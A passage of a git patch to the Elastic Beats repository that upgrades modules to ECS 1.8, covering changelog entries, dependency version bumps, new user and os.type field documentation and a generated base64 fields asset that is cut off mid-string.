.../module/snort/log/config/input.yml | 2 +- .../module/snyk/audit/config/config.yml | 2 +- .../snyk/vulnerabilities/config/config.yml | 2 +- .../sonicwall/firewall/config/input.yml | 2 +- .../module/sophos/utm/config/input.yml | 2 +- .../module/sophos/xg/config/config.yml | 2 +- .../module/sophos/xg/ingest/antivirus.yml | 4 +- .../filebeat/module/sophos/xg/ingest/atp.yml | 3 + .../module/sophos/xg/ingest/cfilter.yml | 3 + .../module/sophos/xg/ingest/event.yml | 5 + .../module/sophos/xg/ingest/firewall.yml | 5 + .../filebeat/module/sophos/xg/ingest/idp.yml | 9 +- .../module/sophos/xg/ingest/pipeline.yml | 5 + .../module/sophos/xg/ingest/sandstorm.yml | 3 + .../filebeat/module/sophos/xg/ingest/waf.yml | 3 + .../xg/test/anti-spam.log-expected.json | 33 + .../xg/test/anti-virus.log-expected.json | 24 + .../sophos/xg/test/atp.log-expected.json | 12 + .../sophos/xg/test/cfilter.log-expected.json | 27 + .../sophos/xg/test/event.log-expected.json | 60 +- .../sophos/xg/test/firewall.log-expected.json | 61 +- .../sophos/xg/test/idp.log-expected.json | 15 + .../sophos/xg/test/sandbox.log-expected.json | 18 + .../sophos/xg/test/waf.log-expected.json | 15 + .../sophos/xg/test/wifi.log-expected.json | 6 + .../module/squid/log/config/input.yml | 2 +- .../module/suricata/eve/config/eve.yml | 2 +- .../module/tomcat/log/config/input.yml | 2 +- .../zeek/capture_loss/config/capture_loss.yml | 2 +- .../zeek/connection/config/connection.yml | 2 +- .../module/zeek/dce_rpc/config/dce_rpc.yml | 2 +- .../filebeat/module/zeek/dhcp/config/dhcp.yml | 2 +- .../filebeat/module/zeek/dnp3/config/dnp3.yml | 2 +- .../filebeat/module/zeek/dns/config/dns.yml | 2 +- .../filebeat/module/zeek/dpd/config/dpd.yml | 2 +- .../module/zeek/files/config/files.yml | 2 +- .../filebeat/module/zeek/ftp/config/ftp.yml | 2 +- .../filebeat/module/zeek/http/config/http.yml | 3 +- .../module/zeek/http/test/http-json.log | 4 +- .../http/test/http-json.log-expected.json | 74 + .../module/zeek/intel/config/intel.yml | 2 +- .../filebeat/module/zeek/irc/config/irc.yml | 2 +- .../module/zeek/kerberos/config/kerberos.yml | 2 +- .../module/zeek/modbus/config/modbus.yml | 2 +- .../module/zeek/mysql/config/mysql.yml | 2 +- .../module/zeek/mysql/ingest/pipeline.yml | 4 + .../module/zeek/notice/config/notice.yml | 2 +- .../filebeat/module/zeek/ntlm/config/ntlm.yml | 2 +- .../filebeat/module/zeek/ocsp/config/ocsp.yml | 2 +- x-pack/filebeat/module/zeek/pe/config/pe.yml | 2 +- .../module/zeek/radius/config/radius.yml | 2 +- .../filebeat/module/zeek/rdp/config/rdp.yml | 2 +- .../filebeat/module/zeek/rfb/config/rfb.yml | 2 +- .../filebeat/module/zeek/sip/config/sip.yml | 2 +- .../module/zeek/smb_cmd/config/smb_cmd.yml | 2 +- .../zeek/smb_files/config/smb_files.yml | 2 +- .../zeek/smb_mapping/config/smb_mapping.yml | 2 +- .../filebeat/module/zeek/smtp/config/smtp.yml | 2 +- .../filebeat/module/zeek/snmp/config/snmp.yml | 2 +- .../module/zeek/socks/config/socks.yml | 2 +- .../filebeat/module/zeek/ssh/config/ssh.yml | 2 +- .../filebeat/module/zeek/ssl/config/ssl.yml | 2 +- .../module/zeek/stats/config/stats.yml | 2 +- .../module/zeek/syslog/config/syslog.yml | 2 +- .../zeek/traceroute/config/traceroute.yml | 2 +- .../module/zeek/tunnel/config/tunnel.yml | 2 +- .../module/zeek/weird/config/weird.yml | 2 +- .../filebeat/module/zeek/x509/config/x509.yml | 2 +- .../module/zoom/webhook/config/webhook.yml | 2 +- .../module/zoom/webhook/ingest/account.yml | 72 +- .../zoom/webhook/ingest/chat_channel.yml | 1 + .../module/zoom/webhook/ingest/meeting.yml | 39 +- .../module/zoom/webhook/ingest/phone.yml | 11 + .../module/zoom/webhook/ingest/pipeline.yml | 13 +- .../module/zoom/webhook/ingest/recording.yml | 32 +- .../module/zoom/webhook/ingest/user.yml | 127 +- .../module/zoom/webhook/ingest/webinar.yml | 65 +- .../module/zoom/webhook/ingest/zoomroom.yml | 4 - .../test/account.ndjson.log-expected.json | 18 +- .../chat_channel.ndjson.log-expected.json | 136 + .../chat_message.ndjson.log-expected.json | 6 + .../test/meeting.ndjson.log-expected.json | 31 +- .../test/phone.ndjson.log-expected.json | 9 + .../test/recording.ndjson.log-expected.json | 138 +- .../test/user.ndjson.log-expected.json | 100 +- .../test/webinar.ndjson.log-expected.json | 54 +- .../module/zscaler/zia/config/input.yml | 2 +- x-pack/functionbeat/docs/fields.asciidoc | 396 +- x-pack/functionbeat/include/fields.go | 2 +- x-pack/heartbeat/include/fields.go | 2 +- x-pack/metricbeat/cmd/root.go | 2 +- .../config/winlogbeat-powershell.js | 49 +- .../test/testdata/4103.evtx.golden.json | 14 + .../test/testdata/4104.evtx.golden.json | 6 + .../test/testdata/4105.evtx.golden.json | 3 + .../test/testdata/4106.evtx.golden.json | 3 + .../security/config/winlogbeat-security.js | 81 +- .../test/testdata/4744.evtx.golden.json | 1 + .../test/testdata/4745.evtx.golden.json | 1 + .../test/testdata/4746.evtx.golden.json | 11 +- .../test/testdata/4747.evtx.golden.json | 11 +- .../test/testdata/4748.evtx.golden.json | 1 + .../test/testdata/4749.evtx.golden.json | 1 + .../test/testdata/4750.evtx.golden.json | 1 + .../test/testdata/4751.evtx.golden.json | 11 +- .../test/testdata/4752.evtx.golden.json | 11 +- .../test/testdata/4753.evtx.golden.json | 1 + .../test/testdata/4759.evtx.golden.json | 1 + .../test/testdata/4760.evtx.golden.json | 1 + .../test/testdata/4761.evtx.golden.json | 11 +- .../test/testdata/4762.evtx.golden.json | 11 +- .../test/testdata/4763.evtx.golden.json | 1 + ...security-windows2012_4778.evtx.golden.json | 3 +- ...security-windows2012_4779.evtx.golden.json | 3 +- ...security-windows2016_4727.evtx.golden.json | 1 + ...security-windows2016_4728.evtx.golden.json | 11 +- ...security-windows2016_4729.evtx.golden.json | 11 +- ...security-windows2016_4730.evtx.golden.json | 1 + ...security-windows2016_4731.evtx.golden.json | 1 + ...security-windows2016_4732.evtx.golden.json | 11 +- ...security-windows2016_4733.evtx.golden.json | 11 +- ...security-windows2016_4734.evtx.golden.json | 1 + ...security-windows2016_4735.evtx.golden.json | 1 + ...security-windows2016_4737.evtx.golden.json | 1 + ...security-windows2016_4754.evtx.golden.json | 1 + ...security-windows2016_4755.evtx.golden.json | 1 + ...security-windows2016_4756.evtx.golden.json | 11 +- ...security-windows2016_4757.evtx.golden.json | 11 +- ...security-windows2016_4758.evtx.golden.json | 1 + ...security-windows2016_4764.evtx.golden.json | 1 + ...security-windows2016_4799.evtx.golden.json | 1 + .../module/sysmon/config/winlogbeat-sysmon.js | 11 +- .../sysmon-11-filedelete.evtx.golden.json | 3 + .../sysmon-11-registry.evtx.golden.json | 15 +- .../sysmon-12-processcreate.evtx.golden.json | 1 + .../testdata/sysmon-9.01.evtx.golden.json | 19 + 510 files changed, 26495 insertions(+), 3814 deletions(-) create mode 100644 auditbeat/module/auditd/golden_files_test.go create mode 100644 auditbeat/module/auditd/testdata/auditlogin.log create mode 100644 auditbeat/module/auditd/testdata/auditlogin.log-expected.json create mode 100644 auditbeat/module/auditd/testdata/centos7.log create mode 100644 auditbeat/module/auditd/testdata/centos7.log-expected.json create mode 100644 auditbeat/module/auditd/testdata/chown.log create mode 100644 auditbeat/module/auditd/testdata/chown.log-expected.json create mode 100644 auditbeat/module/auditd/testdata/passwd.log create mode 100644 auditbeat/module/auditd/testdata/passwd.log-expected.json create mode 100644 auditbeat/module/auditd/testdata/setuid.log create mode 100644 auditbeat/module/auditd/testdata/setuid.log-expected.json create mode 100644 auditbeat/module/auditd/testdata/sudo-asuser.log create mode 100644 auditbeat/module/auditd/testdata/sudo-asuser.log-expected.json create mode 100644 auditbeat/module/auditd/testdata/sudo.log create mode 100644 auditbeat/module/auditd/testdata/sudo.log-expected.json create mode 100644 auditbeat/module/auditd/testdata/useradd.log create mode 100644 auditbeat/module/auditd/testdata/useradd.log-expected.json create mode 100644 auditbeat/module/auditd/testdata/userlogin.log create mode 100644 auditbeat/module/auditd/testdata/userlogin.log-expected.json create mode 100644 filebeat/module/auditd/log/ingest/gen-ecs-mappings.py create mode 100644 filebeat/module/auditd/log/test/avc.log create mode 100644 filebeat/module/auditd/log/test/avc.log-expected.json create mode 100644 filebeat/module/auditd/log/test/useradd.log create mode 100644 filebeat/module/auditd/log/test/useradd.log-expected.json create mode 100644 packetbeat/tests/system/golden/http_basic_auth-expected.json delete mode 100644 x-pack/filebeat/module/crowdstrike/falcon/config/pipeline.js create mode 100644 x-pack/filebeat/module/crowdstrike/falcon/ingest/auth_activity_audit.yml create mode 100644 x-pack/filebeat/module/crowdstrike/falcon/ingest/detection_summary.yml create mode 100644 x-pack/filebeat/module/crowdstrike/falcon/ingest/firewall_match.yml create mode 100644 x-pack/filebeat/module/crowdstrike/falcon/ingest/incident_summary.yml create mode 100644 x-pack/filebeat/module/crowdstrike/falcon/ingest/remote_response_session_end.yml create mode 100644 x-pack/filebeat/module/crowdstrike/falcon/ingest/remote_response_session_start.yml create mode 100644 x-pack/filebeat/module/crowdstrike/falcon/ingest/user_activity_audit.yml create mode 100644 x-pack/filebeat/module/o365/audit/test/08-azuread-users.log create mode 100644 x-pack/filebeat/module/o365/audit/test/08-azuread-users.log-expected.json create mode 100644 x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log create mode 100644 x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log-expected.json delete mode 100644 x-pack/filebeat/module/okta/system/config/pipeline.js diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 1b2f752dada7..e42f4d99c23f 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -381,6 +381,8 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix httpjson input logging so it doesn't conflict with ECS. {pull}23972[23972] - Fix Okta default date formatting. {issue}24018[24018] {pull}24025[24025] - Fix Logstash module handling of logstash.log.log_event.action field. {issue}20709[20709] +- aws/s3access dataset was populating event.duration using the wrong unit. {pull}23920[23920] +- Zoom module pipeline failed to ingest some chat_channel events. {pull}23904[23904] *Heartbeat* @@ -604,6 +606,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add the `enable_krb5_fast` flag to the Kafka output to explicitly opt-in to FAST authentication. {pull}23629[23629] - Added new decode_xml processor to libbeat that is available to all beat types. {pull}23678[23678] - Add deployment name in pod's meta. {pull}23610[23610] +- Added ECS 1.8 `host.os.type` field to `add_host_metadata` processor. {pull}23513[23513] - Add `selector` information in kubernetes services' metadata. {pull}23730[23730] *Auditbeat* @@ -625,6 +628,8 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add several improvements for auditd module for improved ECS field mapping {pull}22647[22647] - Add ECS 1.7 `configuration` categorization in certain events in auditd module. {pull}23000[23000] - Improve file_integrity monitoring when a file is created/deleted in quick succession. {issue}17347[17347] {pull}22170[22170] +- system/host: Add new ECS 1.8 field `os.type` in `host.os.type`. {pull}23513[23513] +- Update Auditbeat auditd module to ECS 1.8 {pull}23594[23594] {issue}23118[23118] *Filebeat* @@ -835,6 +840,26 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Added RFC6587 framing option for tcp and unix inputs {issue}23663[23663] {pull}23724[23724] - Added string splitting for httpjson input {pull}24022[24022] - Added field mappings for Netflow/IPFIX vendor fields that are known to Filebeat. {issue}23771[23771] +- Upgrade Cisco ASA/FTD/Umbrella to ECS 1.8.0. {pull}23819[23819] +- Add new ECS user and categories features to google_workspace/gsuite {issue}23118[23118] {pull}23709[23709] +- Move crowdstrike JS processor to ingest pipelines and upgrade to ECS 1.8.0 {issue}23118[23118] {pull}23875[23875] +- Update Filebeat auditd dataset to ECS 1.8.0. {pull}23723[23723] {issue}23118[23118] +- Updated microsoft defender_atp and m365_defender to ECS 1.8. {pull}23897[23897] {issue}23118[23118] +- Updated o365 module to ECS 1.8. {issue}23118[23118] {pull}23896[23896] +- Upgrade CEF module to ECS 1.8.0. {pull}23832[23832] +- Upgrade fortinet/firewall to ECS 1.8 {issue}23118[23118] {pull}23902[23902] +- Upgrade Zeek to ECS 1.8.0. {issue}23118[23118] {pull}23847[23847] +- Updated azure module to ECS 1.8. {issue}23118[23118] {pull}23927[23927] +- Update aws/s3access to ECS 1.8. {issue}23118[23118] {pull}23920[23920] +- Upgrade panw module to ecs 1.8 {issue}23118[23118] {pull}23931[23931] +- Updated aws/cloudtrail fileset to ECS 1.8. {issue}23118[23118] {pull}23911[23911] +- Upgrade juniper/srx to ecs 1.8.0. {issue}23118[23118] {pull}23936[23936] +- Update mysqlenterprise module to ECS 1.8. {issue}23118[23118] {pull}23978[23978] +- Upgrade sophos/xg fileset to ECS 1.8.0. {issue}23118[23118] {pull}23967[23967] +- Upgrade system/auth to ECS 1.8 {issue}23118[23118] {pull}23961[23961] +- Upgrade elasticsearch/audit to ECS 1.8 {issue}23118[23118] {pull}24000[24000] +- Upgrade okta to ecs 1.8.0 and move js processor to ingest pipeline {issue}23118[23118] {pull}23929[23929] +- Update zoom module to ECS 1.8. {pull}23904[23904] {issue}23118[23118] *Heartbeat* @@ -843,6 +868,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d *Journalbeat* +- Update Journalbeat to ECS 1.8. {pull}23737[23737] *Metricbeat* @@ -978,6 +1004,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Change build process for x-pack distribution {pull}21979[21979] - Tuned the internal queue size to reduce the chances of events being dropped. {pull}22650[22650] - Add support for "http.request.mime_type" and "http.response.mime_type". {pull}22940[22940] +- Upgrade to ECS 1.8.0. {pull}23783[23783] *Functionbeat* @@ -1004,6 +1031,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add dns.question.subdomain fields for sysmon DNS events. {pull}22999[22999] - Add dns.question.top_level_domain fields for sysmon DNS events. {pull}23046[23046] - Add Audit and Authentication Polixy Change Events and related.ip information {pull}20684[20684] +- Add new ECS 1.8 improvements. {pull}23563[23563] *Elastic Log Driver* @@ -1038,7 +1066,3 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d ==== Known Issue *Journalbeat* - - - - diff --git a/NOTICE.txt b/NOTICE.txt index 4a49e2f9af43..d8956ba5a9b5 100644 --- a/NOTICE.txt +++ b/NOTICE.txt @@ -5891,11 +5891,11 @@ This Agreement is governed by the laws of the State of New York and the intellec -------------------------------------------------------------------------------- Dependency : github.com/elastic/ecs -Version: v1.6.0 +Version: v1.0.0-beta2.0.20210202203518-638aa2bb5271 Licence type (autodetected): Apache-2.0 -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/github.com/elastic/ecs@v1.6.0/LICENSE.txt: +Contents of probable licence file $GOMODCACHE/github.com/elastic/ecs@v1.0.0-beta2.0.20210202203518-638aa2bb5271/LICENSE.txt: Apache License @@ -6547,11 +6547,11 @@ Contents of probable licence file $GOMODCACHE/github.com/elastic/go-concert@v0.1 -------------------------------------------------------------------------------- Dependency : github.com/elastic/go-libaudit/v2 -Version: v2.1.0 +Version: v2.2.0 Licence type (autodetected): Apache-2.0 -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/github.com/elastic/go-libaudit/v2@v2.1.0/LICENSE.txt: +Contents of probable licence file $GOMODCACHE/github.com/elastic/go-libaudit/v2@v2.2.0/LICENSE.txt: Apache License @@ -7665,11 +7665,11 @@ Contents of probable licence file $GOMODCACHE/github.com/elastic/go-structform@v -------------------------------------------------------------------------------- Dependency : github.com/elastic/go-sysinfo -Version: v1.3.0 +Version: v1.5.0 Licence type (autodetected): Apache-2.0 -------------------------------------------------------------------------------- -Contents of probable licence file $GOMODCACHE/github.com/elastic/go-sysinfo@v1.3.0/LICENSE.txt: +Contents of probable licence file $GOMODCACHE/github.com/elastic/go-sysinfo@v1.5.0/LICENSE.txt: Apache License diff --git a/auditbeat/_meta/fields.common.yml b/auditbeat/_meta/fields.common.yml index a7633a98b0cc..f6c6e6d7145b 100644 --- a/auditbeat/_meta/fields.common.yml +++ b/auditbeat/_meta/fields.common.yml @@ -66,27 +66,6 @@ type: keyword description: Audit user name. - - name: effective - type: group - description: Effective user information. - fields: - - name: id - type: keyword - description: Effective user ID. - - name: name - type: keyword - description: Effective user name. - - name: group - type: group - description: Effective group information. - fields: - - name: id - type: keyword - description: Effective group ID. - - name: name - type: keyword - description: Effective group name. - - name: filesystem type: group description: Filesystem user information. diff --git a/auditbeat/cmd/root.go b/auditbeat/cmd/root.go index a819fa708f96..0766f05b05c0 100644 --- a/auditbeat/cmd/root.go +++ b/auditbeat/cmd/root.go @@ -35,7 +35,7 @@ const ( Name = "auditbeat" // ecsVersion specifies the version of ECS that Auditbeat is implementing. - ecsVersion = "1.7.0" + ecsVersion = "1.8.0" ) // RootCmd for running auditbeat. diff --git a/auditbeat/docs/fields.asciidoc b/auditbeat/docs/fields.asciidoc index a3411566ed51..cd143ad919e7 100644 --- a/auditbeat/docs/fields.asciidoc +++ b/auditbeat/docs/fields.asciidoc @@ -51,15 +51,6 @@ alias to: user.id -- -*`user.euid`*:: -+ --- -type: alias - -alias to: user.effective.id - --- - *`user.fsuid`*:: + -- @@ -87,15 +78,6 @@ alias to: user.group.id -- -*`user.egid`*:: -+ --- -type: alias - -alias to: user.effective.group.id - --- - *`user.sgid`*:: + -- @@ -139,15 +121,6 @@ alias to: user.name -- -*`user.name_map.euid`*:: -+ --- -type: alias - -alias to: user.effective.name - --- - *`user.name_map.fsuid`*:: + -- @@ -175,15 +148,6 @@ alias to: user.group.name -- -*`user.name_map.egid`*:: -+ --- -type: alias - -alias to: user.effective.group.name - --- - *`user.name_map.sgid`*:: + -- @@ -2722,54 +2686,6 @@ type: keyword -- -[float] -=== effective - -Effective user information. - - -*`user.effective.id`*:: -+ --- -Effective user ID. - -type: keyword - --- - -*`user.effective.name`*:: -+ --- -Effective user name. - -type: keyword - --- - -[float] -=== group - -Effective group information. - - -*`user.effective.group.id`*:: -+ --- -Effective group ID. - -type: keyword - --- - -*`user.effective.group.name`*:: -+ --- -Effective group name. - -type: keyword - --- - [float] === filesystem @@ -4738,7 +4654,7 @@ example: apache + -- Raw text message of entire event. Used to demonstrate log integrity. -This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. +This field is not indexed and doc_values are disabled. It cannot be searched, but it can be retrieved from `_source`. If users wish to override this and index this field, consider using the wildcard data type. type: keyword @@ -4791,7 +4707,7 @@ example: Terminated an unexpected process + -- Reference URL linking to additional information about this event. -This URL links to a static definition of the this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. +This URL links to a static definition of this event. Alert events, indicated by `event.kind:alert`, are a common use case for this field. type: keyword @@ -5982,6 +5898,19 @@ example: darwin -- +*`host.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`host.os.version`*:: + -- @@ -7056,6 +6985,19 @@ example: darwin -- +*`observer.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`observer.os.version`*:: + -- @@ -7226,6 +7168,19 @@ example: darwin -- +*`os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`os.version`*:: + -- @@ -10377,6 +10332,7 @@ URL fields provide support for complete or partial URLs, and supports the breaki -- Domain of the url, such as "www.elastic.co". In some cases a URL may refer to an IP and/or port directly, without a domain name. In this case, the IP address would go to the `domain` field. +If the URL contains a literal IPv6 address enclosed by `[` and `]` (IETF RFC 2732), the `[` and `]` characters should also be captured in the `domain` field. type: keyword @@ -10552,6 +10508,119 @@ The user fields describe information about the user that is relevant to the even Fields can have one entry or multiple entries. If a user has more than one id, provide an array that includes all of them. +*`user.changes.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.changes.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.changes.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.changes.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.changes.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.changes.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.changes.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.changes.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.changes.name.text`*:: ++ +-- +type: text + +-- + +*`user.changes.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.domain`*:: + -- @@ -10562,6 +10631,119 @@ type: keyword -- +*`user.effective.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.effective.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.effective.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.effective.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.effective.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.effective.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.effective.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.effective.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.effective.name.text`*:: ++ +-- +type: text + +-- + +*`user.effective.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + *`user.email`*:: + -- @@ -10665,6 +10847,119 @@ example: ["kibana_admin", "reporting_user"] -- +*`user.target.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.target.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.target.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.target.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.target.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.target.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.target.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.target.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.target.name.text`*:: ++ +-- +type: text + +-- + +*`user.target.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + [float] === user_agent @@ -10781,6 +11076,19 @@ example: darwin -- +*`user_agent.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + *`user_agent.os.version`*:: + -- @@ -12040,6 +12348,16 @@ type: keyword The operating system's kernel version. +type: keyword + +-- + +*`system.audit.host.os.type`*:: ++ +-- +OS type (see ECS os.type). + + type: keyword -- diff --git a/auditbeat/include/fields.go b/auditbeat/include/fields.go index 6930e7ef2b86..861d51b9705e 100644 --- a/auditbeat/include/fields.go +++ b/auditbeat/include/fields.go @@ -32,5 +32,5 @@ func init() { // AssetFieldsYml returns asset data. // This is the base64 encoded gzipped contents of fields.yml. func AssetFieldsYml() string { - return "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